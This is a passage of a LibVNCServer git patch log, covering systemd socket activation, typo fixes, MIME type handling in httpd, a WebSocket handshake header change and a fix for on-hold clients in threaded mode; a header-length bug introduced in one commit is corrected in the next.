Russell Date: Wed, 7 Sep 2016 14:49:48 -0400 Subject: Support systemd socket activation --- CMakeLists.txt | 12 +++++ configure.ac | 3 ++ libvncserver/Makefile.am | 6 +++ libvncserver/sockets.c | 112 ++++++++++++++++++++++++++++------------------- 4 files changed, 89 insertions(+), 44 deletions(-) (limited to 'libvncserver') diff --git a/CMakeLists.txt b/CMakeLists.txt index 12367ec..8e1839c 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -36,6 +36,7 @@ find_package(GnuTLS) find_package(Threads) find_package(X11) find_package(OpenSSL) +find_package(PkgConfig) find_library(LIBGCRYPT_LIBRARIES gcrypt) # Check whether the version of libjpeg we found was libjpeg-turbo and print a @@ -102,6 +103,17 @@ if(PNG_FOUND) endif(PNG_FOUND) option(LIBVNCSERVER_ALLOW24BPP "Allow 24 bpp" ON) +pkg_check_modules(SYSTEMD "libsystemd") +if(SYSTEMD_FOUND) + option(LIBVNCSERVER_WITH_SYSTEMD "Build with systemd socket activation support" ON) +endif(SYSTEMD_FOUND) + +if(LIBVNCSERVER_WITH_SYSTEMD) + add_definitions(-DLIBVNCSERVER_WITH_SYSTEMD) + include_directories(${SYSTEMD_INCLUDE_DIRS}) + set(ADDITIONAL_LIBS ${ADDITIONAL_LIBS} ${SYSTEMD_LIBRARIES}) +endif(LIBVNCSERVER_WITH_SYSTEMD) + if(GNUTLS_FOUND) set(LIBVNCSERVER_WITH_CLIENT_TLS 1) option(LIBVNCSERVER_WITH_WEBSOCKETS "Build with websockets support (gnutls)" ON) diff --git a/configure.ac b/configure.ac index 9651809..0b58743 100644 --- a/configure.ac +++ b/configure.ac @@ -68,6 +68,9 @@ if test ! -z "$with_ffmpeg"; then fi AM_CONDITIONAL(HAVE_MP3LAME, test "$HAVE_MP3LAME" = "true") +PKG_CHECK_MODULES([LIBSYSTEMD], [libsystemd], [with_systemd=1], [with_systemd=0]) +AM_CONDITIONAL([WITH_SYSTEMD], [test $with_systemd -eq 1]) + # Seem to need this dummy here to induce the 'checking for egrep... grep -E', etc. # before it seemed to be inside the with_jpeg conditional. AC_CHECK_HEADER(thenonexistentheader.h, HAVE_THENONEXISTENTHEADER_H="true") diff --git a/libvncserver/Makefile.am b/libvncserver/Makefile.am index 2f23e31..e25784b 100644 --- a/libvncserver/Makefile.am +++ b/libvncserver/Makefile.am @@ -59,6 +59,12 @@ LIB_SRCS = main.c rfbserver.c rfbregion.c auth.c sockets.c $(WEBSOCKETSSRCS) \ libvncserver_la_SOURCES=$(LIB_SRCS) libvncserver_la_LIBADD=$(WEBSOCKETSSSLLIBS) +if WITH_SYSTEMD +AM_CPPFLAGS += -DLIBVNCSERVER_WITH_SYSTEMD +libvncserver_la_CFLAGS = $(LIBSYSTEMD_CFLAGS) +libvncserver_la_LIBADD += $(LIBSYSTEMD_LIBS) +endif + lib_LTLIBRARIES=libvncserver.la libvncserver_la_LDFLAGS = -version-info 1:0:0 diff --git a/libvncserver/sockets.c b/libvncserver/sockets.c index 51e86eb..d4822f4 100644 --- a/libvncserver/sockets.c +++ b/libvncserver/sockets.c @@ -77,6 +77,10 @@ #include "rfbssl.h" #endif +#ifdef LIBVNCSERVER_WITH_SYSTEMD +#include +#endif + #if defined(__linux__) && defined(NEED_TIMEVAL) struct timeval { @@ -122,6 +126,54 @@ int deny_severity=LOG_WARNING; int rfbMaxClientWait = 20000; /* time (ms) after which we decide client has gone away - needed to stop us hanging */ +static rfbBool +rfbNewConnectionFromSock(rfbScreenInfoPtr rfbScreen, int sock) +{ + const int one = 1; +#ifdef LIBVNCSERVER_IPv6 + struct sockaddr_storage addr; +#else + struct sockaddr_in addr; +#endif + socklen_t addrlen = sizeof(addr); + + getpeername(sock, (struct sockaddr *)&addr, &addrlen); + + if(!rfbSetNonBlocking(sock)) { + rfbLogPerror("rfbCheckFds: setnonblock"); + closesocket(sock); + return FALSE; + } + + if (setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, + (char *)&one, sizeof(one)) < 0) { + rfbLogPerror("rfbCheckFds: setsockopt failed: can't set TCP_NODELAY flag, non TCP socket?"); + } + +#ifdef USE_LIBWRAP + if(!hosts_ctl("vnc",STRING_UNKNOWN,inet_ntoa(addr.sin_addr), + STRING_UNKNOWN)) { + rfbLog("Rejected connection from client %s\n", + inet_ntoa(addr.sin_addr)); + closesocket(sock); + return FALSE; + } +#endif + +#ifdef LIBVNCSERVER_IPv6 + char host[1024]; + if(getnameinfo((struct sockaddr*)&addr, addrlen, host, sizeof(host), NULL, 0, NI_NUMERICHOST) != 0) { + rfbLogPerror("rfbProcessNewConnection: error in getnameinfo"); + } + rfbLog("Got connection from client %s\n", host); +#else + rfbLog("Got connection from client %s\n", inet_ntoa(addr.sin_addr)); +#endif + + rfbNewClient(rfbScreen,sock); + return TRUE; +} + /* * rfbInitSockets sets up the TCP and UDP sockets to listen for RFB * connections. It does nothing if called again. @@ -138,6 +190,20 @@ rfbInitSockets(rfbScreenInfoPtr rfbScreen) rfbScreen->socketState = RFB_SOCKET_READY; +#ifdef LIBVNCSERVER_WITH_SYSTEMD + if (sd_listen_fds(0) == 1) + { + int sock = SD_LISTEN_FDS_START + 0; + if (sd_is_socket(sock, AF_UNSPEC, 0, 0)) + rfbNewConnectionFromSock(rfbScreen, sock); + else if (sd_is_socket(sock, AF_UNSPEC, 0, 1)) + rfbProcessNewConnection(rfbScreen); + return; + } + else + rfbLog("Unable to establish connection with systemd socket\n"); +#endif + if (rfbScreen->inetdSock != -1) { const int one = 1; @@ -411,14 +477,7 @@ rfbCheckFds(rfbScreenInfoPtr rfbScreen,long usec) rfbBool rfbProcessNewConnection(rfbScreenInfoPtr rfbScreen) { - const int one = 1; int sock = -1; -#ifdef LIBVNCSERVER_IPv6 - struct sockaddr_storage addr; -#else - struct sockaddr_in addr; -#endif - socklen_t addrlen = sizeof(addr); fd_set listen_fds; int chosen_listen_sock = -1; @@ -439,47 +498,12 @@ rfbProcessNewConnection(rfbScreenInfoPtr rfbScreen) if (rfbScreen->listen6Sock >= 0 && FD_ISSET(rfbScreen->listen6Sock, &listen_fds)) chosen_listen_sock = rfbScreen->listen6Sock; - if ((sock = accept(chosen_listen_sock, - (struct sockaddr *)&addr, &addrlen)) < 0) { + if ((sock = accept(chosen_listen_sock, NULL, NULL)) < 0) { rfbLogPerror("rfbCheckFds: accept"); return FALSE; } - if(!rfbSetNonBlocking(sock)) { - closesocket(sock); - return FALSE; - } - - if (setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, - (char *)&one, sizeof(one)) < 0) { - rfbLogPerror("rfbCheckFds: setsockopt failed: can't set TCP_NODELAY flag, non TCP socket?"); - } - -#ifdef USE_LIBWRAP - if(!hosts_ctl("vnc",STRING_UNKNOWN,inet_ntoa(addr.sin_addr), - STRING_UNKNOWN)) { - rfbLog("Rejected connection from client %s\n", - inet_ntoa(addr.sin_addr)); - closesocket(sock); - return FALSE; - } -#endif - -#ifdef LIBVNCSERVER_IPv6 - { - char host[1024]; - if(getnameinfo((struct sockaddr*)&addr, addrlen, host, sizeof(host), NULL, 0, NI_NUMERICHOST) != 0) { - rfbLogPerror("rfbProcessNewConnection: error in getnameinfo"); - } - rfbLog("Got connection from client %s\n", host); - } -#else - rfbLog("Got connection from client %s\n", inet_ntoa(addr.sin_addr)); -#endif - - rfbNewClient(rfbScreen,sock); - - return TRUE; + return rfbNewConnectionFromSock(rfbScreen, sock); } -- cgit v1.2.3 From 63bc75f24b8a82910f5864d5c3348e284be66ade Mon Sep 17 00:00:00 2001 From: Stefan Weil Date: Fri, 18 Nov 2016 08:23:11 +0100 Subject: Fix some typos (found by codespell) Signed-off-by: Stefan Weil --- libvncserver/main.c | 2 +- webclients/novnc/include/display.js | 2 +- webclients/novnc/include/ui.js | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) (limited to 'libvncserver') diff --git a/libvncserver/main.c b/libvncserver/main.c index a8458e4..47dac11 100644 --- a/libvncserver/main.c +++ b/libvncserver/main.c @@ -582,7 +582,7 @@ listenerRun(void *data) socklen_t len; fd_set listen_fds; /* temp file descriptor list for select() */ - /* TODO: this thread wont die by restarting the server */ + /* TODO: this thread won't die by restarting the server */ /* TODO: HTTP is not handled */ while (1) { client_fd = -1; diff --git a/webclients/novnc/include/display.js b/webclients/novnc/include/display.js index a42b854..e255683 100644 --- a/webclients/novnc/include/display.js +++ b/webclients/novnc/include/display.js @@ -76,7 +76,7 @@ var Display; } if (this._prefer_js === null) { - Util.Info("Prefering javascript operations"); + Util.Info("Preferring javascript operations"); this._prefer_js = true; } diff --git a/webclients/novnc/include/ui.js b/webclients/novnc/include/ui.js index 4748ff0..50bbfcb 100644 --- a/webclients/novnc/include/ui.js +++ b/webclients/novnc/include/ui.js @@ -883,7 +883,7 @@ var UI; $D('showKeyboard').className = "noVNC_status_button"; //Weird bug in iOS if you change keyboardVisible //here it does not actually occur so next time - //you click keyboard icon it doesnt work. + //you click keyboard icon it doesn't work. UI.hideKeyboardTimeout = setTimeout(function() { UI.setKeyboard(); },100); }, -- cgit v1.2.3 From 65106d39627499ace4f1ed8701d3ab6c7f97f56f Mon Sep 17 00:00:00 2001 From: Christian Beier Date: Fri, 25 Nov 2016 15:07:48 +0100 Subject: httpd: rework mime type handling to recognise more types --- libvncserver/httpd.c | 20 +++++++++++++------- 1 file changed, 13 insertions(+), 7 deletions(-) (limited to 'libvncserver') diff --git a/libvncserver/httpd.c b/libvncserver/httpd.c index 236ab3e..fe7ac22 100644 --- a/libvncserver/httpd.c +++ b/libvncserver/httpd.c @@ -81,9 +81,7 @@ "Invalid Request\n" \ "

Invalid request

\n" -#define OK_STR "HTTP/1.0 200 OK\r\nConnection: close\r\n\r\n" -#define OK_STR_HTML "HTTP/1.0 200 OK\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n" - +#define OK_STR "HTTP/1.0 200 OK\r\nConnection: close\r\n" static void httpProcessInput(rfbScreenInfoPtr screen); @@ -454,10 +452,18 @@ httpProcessInput(rfbScreenInfoPtr rfbScreen) return; } - if(performSubstitutions) /* is the 'index.vnc' file */ - rfbWriteExact(&cl, OK_STR_HTML, strlen(OK_STR_HTML)); - else - rfbWriteExact(&cl, OK_STR, strlen(OK_STR)); + rfbWriteExact(&cl, OK_STR, strlen(OK_STR)); + char *ext = strrchr(fname, '.'); + char *contentType = ""; + if(ext && strcasecmp(ext, ".vnc") == 0) + contentType = "Content-Type: text/html\r\n"; + else if(ext && strcasecmp(ext, ".css") == 0) + contentType = "Content-Type: text/css\r\n"; + else if(ext && strcasecmp(ext, ".svg") == 0) + contentType = "Content-Type: image/svg+xml\r\n"; + rfbWriteExact(&cl, contentType, strlen(contentType)); + /* end the header */ + rfbWriteExact(&cl, "\r\n", 4); while (1) { int n = fread(buf, 1, BUF_SIZE-1, fd); -- cgit v1.2.3 From 21f8a8d33da3de64b268f5aa2653f46fdb688da0 Mon Sep 17 00:00:00 2001 From: Samuel Mannehed Date: Fri, 2 Dec 2016 12:48:35 +0100 Subject: Write the correct length for end of header Fix for commit 65106d39627499ace4f1ed8701d3ab6c7f97f56f --- libvncserver/httpd.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'libvncserver') diff --git a/libvncserver/httpd.c b/libvncserver/httpd.c index fe7ac22..8634b15 100644 --- a/libvncserver/httpd.c +++ b/libvncserver/httpd.c @@ -463,7 +463,7 @@ httpProcessInput(rfbScreenInfoPtr rfbScreen) contentType = "Content-Type: image/svg+xml\r\n"; rfbWriteExact(&cl, contentType, strlen(contentType)); /* end the header */ - rfbWriteExact(&cl, "\r\n", 4); + rfbWriteExact(&cl, "\r\n", 2); while (1) { int n = fread(buf, 1, BUF_SIZE-1, fd); -- cgit v1.2.3 From aed23ae5c3b1e5d20646733c590edfaef16940d4 Mon Sep 17 00:00:00 2001 From: Kyle Russell Date: Tue, 1 Nov 2016 15:47:25 -0400 Subject: websockets: Don't supply Sec-WebSocket-Protocol if not in request --- libvncserver/websockets.c | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) (limited to 'libvncserver') diff --git a/libvncserver/websockets.c b/libvncserver/websockets.c index b5d99fc..bdec8f3 100644 --- a/libvncserver/websockets.c +++ b/libvncserver/websockets.c @@ -153,6 +153,11 @@ Sec-WebSocket-Accept: %s\r\n\ Sec-WebSocket-Protocol: %s\r\n\ \r\n" +#define SERVER_HANDSHAKE_HYBI_NO_PROTOCOL "HTTP/1.1 101 Switching Protocols\r\n\ +Upgrade: websocket\r\n\ +Connection: Upgrade\r\n\ +Sec-WebSocket-Accept: %s\r\n\ +\r\n" #define WEBSOCKETS_CLIENT_CONNECT_WAIT_MS 100 #define WEBSOCKETS_CLIENT_SEND_WAIT_MS 100 @@ -390,8 +395,12 @@ webSocketsHandshake(rfbClientPtr cl, char *scheme) char accept[B64LEN(SHA1_HASH_SIZE) + 1]; rfbLog(" - WebSockets client version hybi-%02d\n", sec_ws_version); webSocketsGenSha1Key(accept, sizeof(accept), sec_ws_key); - len = snprintf(response, WEBSOCKETS_MAX_HANDSHAKE_LEN, - SERVER_HANDSHAKE_HYBI, accept, protocol); + if(strlen(protocol) > 0) + len = snprintf(response, WEBSOCKETS_MAX_HANDSHAKE_LEN, + SERVER_HANDSHAKE_HYBI, accept, protocol); + else + len = snprintf(response, WEBSOCKETS_MAX_HANDSHAKE_LEN, + SERVER_HANDSHAKE_HYBI_NO_PROTOCOL, accept); } else { /* older hixie handshake, this could be removed if * a final standard is established */ -- cgit v1.2.3 From 78b101f09d01141488261b96dcc01c9aec5f1649 Mon Sep 17 00:00:00 2001 From: Christian Beier Date: Wed, 28 Dec 2016 19:41:52 +0100 Subject: LibVNCServer: fix starting of an onHold-client in threaded mode. Discovered by madscientist159 on 11 Jan 2015: "noted in testing with the threaded server build, whereby if newClientHook() returned RFB_CLIENT_ON_HOLD there was no way to release the hold when the server became ready" --- libvncserver/main.c | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) (limited to 'libvncserver') diff --git a/libvncserver/main.c b/libvncserver/main.c index 47dac11..dbda77d 100644 --- a/libvncserver/main.c +++ b/libvncserver/main.c @@ -612,21 +612,18 @@ listenerRun(void *data) return(NULL); } -void -rfbStartOnHoldClient(rfbClientPtr cl) -{ - pthread_create(&cl->client_thread, NULL, clientInput, (void *)cl); -} - -#else +#endif void rfbStartOnHoldClient(rfbClientPtr cl) { - cl->onHold = FALSE; + cl->onHold = FALSE; +#ifdef LIBVNCSERVER_HAVE_LIBPTHREAD + if(cl->screen->backgroundLoop) + pthread_create(&cl->client_thread, NULL, clientInput, (void *)cl); +#endif } -#endif void rfbRefuseOnHoldClient(rfbClientPtr cl) -- cgit v1.2.3